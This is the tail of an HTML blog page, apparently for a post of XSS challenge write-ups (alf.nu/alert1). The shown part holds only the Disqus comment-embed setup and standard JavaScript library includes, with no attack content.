        this.page.identifier = '2018/01/29/XSS练习-alf-nu-alert1-Write-ups/';
        this.page.title = 'XSS练习:alf.nu/alert1 Write-ups';
    };
    (function() {
    var d = document, s = d.createElement('script');

    s.src = '//cxliker.disqus.com/embed.js';

    s.setAttribute('data-timestamp', +new Date());
    (d.head || d.body).appendChild(s);
    })();  
  </script><script type="text/javascript" src="/lib/jquery/jquery.min.js"></script>
  <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  <script type="text/javascript" src="/lib/pjax/jquery.pjax.min.js"></script>
  <script type="text/javascript" src="/lib/nprogress/nprogress.min.js"></script>
  <script type="text/javascript" src="/js/src/even.js?v=2.11.1"></script>
</body>
</html>
